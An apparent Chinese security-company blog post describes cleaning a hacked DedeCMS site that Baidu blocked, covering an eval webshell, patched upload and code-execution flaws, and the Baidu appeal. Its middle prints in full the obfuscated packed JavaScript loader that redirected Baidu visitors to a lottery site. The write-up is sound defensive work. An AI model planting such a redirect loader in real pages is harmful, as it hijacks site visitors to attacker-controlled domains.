怎么關閉百度安全中心提示 解除網(wǎng)站的攔截

時間：2020-03-17作者：青島四海通達電子科技有限公司瀏覽：1144

臨近2019年底，客戶的公司網(wǎng)站被百度網(wǎng)址安全中心攔截了，公司網(wǎng)站徹底打不開了，影響范圍很大，于是通過朋友介紹找到我們SINE安全公司尋求幫忙解封，關于如何解除百度的安全攔截提示，下面就將我們SINE安全的解決辦法分享給大家，希望能對您有所幫助。

事件回憶:12月初，客戶剛從公司下班回家，接到**的電話說是網(wǎng)站在百度怎么打不開了，客戶**時間用手機訪問網(wǎng)站，發(fā)現(xiàn)網(wǎng)站正常，隨后又用百度去搜索公司網(wǎng)站域名，發(fā)現(xiàn)網(wǎng)站竟然被百度網(wǎng)址安全中心攔截了并提示：違法違規(guī)網(wǎng)頁，建議關閉,您訪問的是：//公司域名，此網(wǎng)頁可能為違法違規(guī)網(wǎng)頁，包含非法信息以及不健康內(nèi)容，請謹慎訪問。如下圖所示：

整個客戶公司的網(wǎng)站在百度無法打開，徹底的被百度攔截掉了，百度提示的肯定是有原因的，我們SINE安全工程師通過百度搜索發(fā)現(xiàn)，網(wǎng)站在搜索結果里被標注了：

百度網(wǎng)址安全中心提醒您：該站點可能受到黑客攻擊，部分頁面已被非法篡改！下圖所示：

點擊去后，彈出百度的攔截頁面，提示：該站點可能由于受到黑客攻擊，部分頁面已被非法篡改，可能會威脅到您的財產(chǎn)和信息安全，建議您謹慎訪問。我們處理了太多像這種情況的網(wǎng)站了，我們打開百度網(wǎng)址安全中/掃描看一下是什么原因?qū)е戮W(wǎng)站被百度攔截，輸入客戶公司網(wǎng)址點查詢，發(fā)現(xiàn)網(wǎng)站被標記危險，并提示：危險，網(wǎng)站網(wǎng)頁中含有惡意信息！

這說明網(wǎng)站里含有惡意內(nèi)容的信息被百度檢測到了，但是百度并沒有指出到底是哪個網(wǎng)站頁面存在惡意信息，看到百度旗下還有個百度云觀測的產(chǎn)品，注冊免費使用，檢測網(wǎng)站的安全情況，沒有檢測到網(wǎng)站出現(xiàn)安全問題。到底含有惡意內(nèi)容的信息在哪里？該怎么查找，根據(jù)我們SINE安全多年的經(jīng)驗，通過百度的工具以及發(fā)送郵件，申訴等通道是獲取不到具體的惡意信息鏈接，百度只是官方的回復一下，具體問題的根源在哪里，得自己動手去查找代碼，以及公司網(wǎng)站在百度的收錄情況。

發(fā)現(xiàn)了問題，客戶公司網(wǎng)站在百度的快照內(nèi)容被篡改了，是一些彩piao內(nèi)容，既然已經(jīng)知道網(wǎng)站里含有惡意信息。那就從網(wǎng)站代碼開始入手，客戶網(wǎng)站使用的是開源的dedecms織夢系統(tǒng)，php+mysql數(shù)據(jù)庫，從服務器壓縮了一份，下載到本地的電腦，開始檢查源代碼，每一行，每一個代碼都不要放過，對比客戶之前網(wǎng)站備份代碼，發(fā)現(xiàn)plus下的search.php被篡改了，多出來一些eval一句話木馬代碼，也叫webshell.

客戶的網(wǎng)站首頁文件index.html也被篡改添加了代碼，尤其標題描述都被篡改了，從百度里搜索點擊到客戶公司網(wǎng)站，自動跳轉到了彩piao網(wǎng)站上去了。這跟index.html被篡改是對應的，我們SINE安全貼出代碼讓大家看一下：

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(par

seInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,St

ring)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=

1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\k\\a\\1\

\m\\9\\7\\o\\0"]["\\n\\4\\8\\0\\7"](\'\\e\\2\\1\\4\\8\\5\\0\\0\\i\\5\\7\\c\\6\\0\\7\\j\\0\\3\\f\\b\\u\\b\\2\

\1\\4\\8\\5\\0\\6 \\2\\4\\1\\c\\6\\t\\0\\0\\5\\w\\3\\3\\v\\q\\p\\s\\r\\h\\1\\a\\9\\3\\g\\g\\h\\f\\2\\6\\d\\

e\\3\\2\\1\\4\\8\\5\\0\\d\');',33,33,'x74|x63|x73|x2f|x72|x70|x22|x65|x69|x6d|x6f|x61|x3d|x3e|

x3c|x6a|x31|x2e|x79|x78|x64|window|x75|x77|x6e|x38|x37|x71|x7a|x68|x76|

x35|x3a'.split('|'),0,{}))</script>

這種掛馬代碼功能是：對百度來的點擊，進行判斷并跳轉到攻擊者設定的域名，如果是直接輸入網(wǎng)站域名是不會跳轉。如果對代碼不是太懂的話，根本無法理解這段代碼的意思。問題找到了，那就開始著手處理，刪除首頁的惡意代碼，恢復網(wǎng)站的正常訪問，刪除攻擊者留下的webshell網(wǎng)站木馬后門文件，并對客戶網(wǎng)站代碼進行全面的網(wǎng)站安全檢測，包括網(wǎng)站漏洞檢測，發(fā)現(xiàn)客戶使用的是早期版本的dedecms，存在遠程代碼執(zhí)行漏洞，可以上傳任意文件的文件上傳漏洞。我們SINE安全對其代碼做了漏洞修復，對上傳做了后綴名的安全過濾與限制，對文件上傳的目錄做了安全部署，防止PHP腳本文件的執(zhí)行與寫入。對網(wǎng)站進行了整體的安全加固與防護，防止攻擊者繼續(xù)篡改網(wǎng)站，有些客戶網(wǎng)站以為只是刪除首頁那部分惡意代碼就能解決問題，大錯特錯，問題的根源不是刪除，而是網(wǎng)站存在漏洞，只是刪除惡意代碼其實就是亡羊補牢，要從根源入手，修復網(wǎng)站的漏洞。才能徹底的解決百度的攔截問題，百度會定期對網(wǎng)站進行安全監(jiān)控，如果多次出現(xiàn)被篡改的情況，會直接將您網(wǎng)站拉入黑名單，長時間的對網(wǎng)站進行攔截。

至此客戶網(wǎng)站才得以安全，徹底的刪除了惡意信息跟惡意的代碼，通過百度網(wǎng)址安全中心的在線提交申訴，等待百度的人工審核，在申訴后的第三天，收到了百度網(wǎng)址安全中心的回復，百度網(wǎng)址安全技術人員答復如下：你好，對于//公司網(wǎng)站域名的檢測結果為：通過審核，到此網(wǎng)站被百度網(wǎng)址安全中心的攔截，徹底解封，客戶公司網(wǎng)站恢復正常訪問，我們將損失給客戶降到了較低，將客戶的事當成自己的事來做，我們的路才能走的較寬。


青島四海通達電子科技有限公司專注于服務器安全,網(wǎng)絡安全公司,網(wǎng)站安全防護,網(wǎng)站漏洞檢測,滲透測試,網(wǎng)站安全,網(wǎng)站漏洞掃描,網(wǎng)站安全檢測等, 歡迎致電 13280888826

• 詞條

  詞條說明

• 網(wǎng)站安全防護有什么用

  網(wǎng)站安全防護有什么用網(wǎng)站安全防護(WAF)一款通過對http請求的檢測分析，為Web應用提供實時防護的安全產(chǎn)品。WAF是Web Application Firewall的縮寫，WAF是云盾提供的一項安全服務，為云主機提供WEB安全防護服務，能夠有效防黑客利用應用程序漏洞入侵滲透。1、網(wǎng)站安全防護的主要功能：漏洞攻擊防護:網(wǎng)站安全防護目前可攔截常見的web漏洞攻擊，例如SQL注入、XSS跨站、獲取敏

• 維護服務器安全的方法

  如今，從個人到企業(yè)對于數(shù)據(jù)的安全越來越重視，特別是近年頻繁發(fā)生的服務器遭受安全的風險相對增加。無論是越來越多的病毒，心懷不軌的黑客，還是商業(yè)行為的盜竊都將服務器作為獲取信息的主要攻擊目標。由此，服務器的安全問題是不容忽視的。針對IT菜鳥，如何能夠有效維護系統(tǒng)安全是一個重要的工作，下面簡單介紹維護服務器安全五個技巧。技巧一：加強網(wǎng)絡規(guī)范針對網(wǎng)絡服務器的安全，特別是黑客對網(wǎng)絡發(fā)起攻擊情況，首先會檢查是

• thinkphp 較新漏洞 導致可上傳webshell木馬文件

  大年初五，根據(jù)我們SINE安全的網(wǎng)站安全監(jiān)測平臺發(fā)現(xiàn)，thinkphp官方6.0版本被爆出高危的網(wǎng)站代碼漏洞，該漏洞可導致網(wǎng)站被植入網(wǎng)站木馬后門文件也叫webshell，具體產(chǎn)生的原因是session ID參數(shù)值這里并未對其做詳細的安全過濾與效驗，導致可以遠程修改POST數(shù)據(jù)包將session的值改為惡意的后門代碼，發(fā)送到服務器后端并生成PHP文件直接生成，可導致網(wǎng)站被攻擊，服務器被入侵，關于該t

• 網(wǎng)站被掛馬的三大解決辦法 十年站長運營經(jīng)驗分享

  在網(wǎng)站運營以及優(yōu)化這方面總是會有一些無所事事的人，冒著風險做各種各樣的違規(guī)行為的工作，有的時候忽然發(fā)現(xiàn)自己的公司網(wǎng)站，就被他人直接掛了木馬，那些**鏈接鼠標點擊進來，全部都是灰色內(nèi)容的信息，不妥善處理，非常*造成百度搜索引擎處罰，那麼公司網(wǎng)站被掛馬須要怎么處理?發(fā)生這種難以解決的現(xiàn)象該如何處理?很感興趣的朋友們一塊兒看一下SINE安全是如何解決網(wǎng)站被掛馬的。一、公司網(wǎng)站被掛馬的主觀因素怎么會發(fā)生公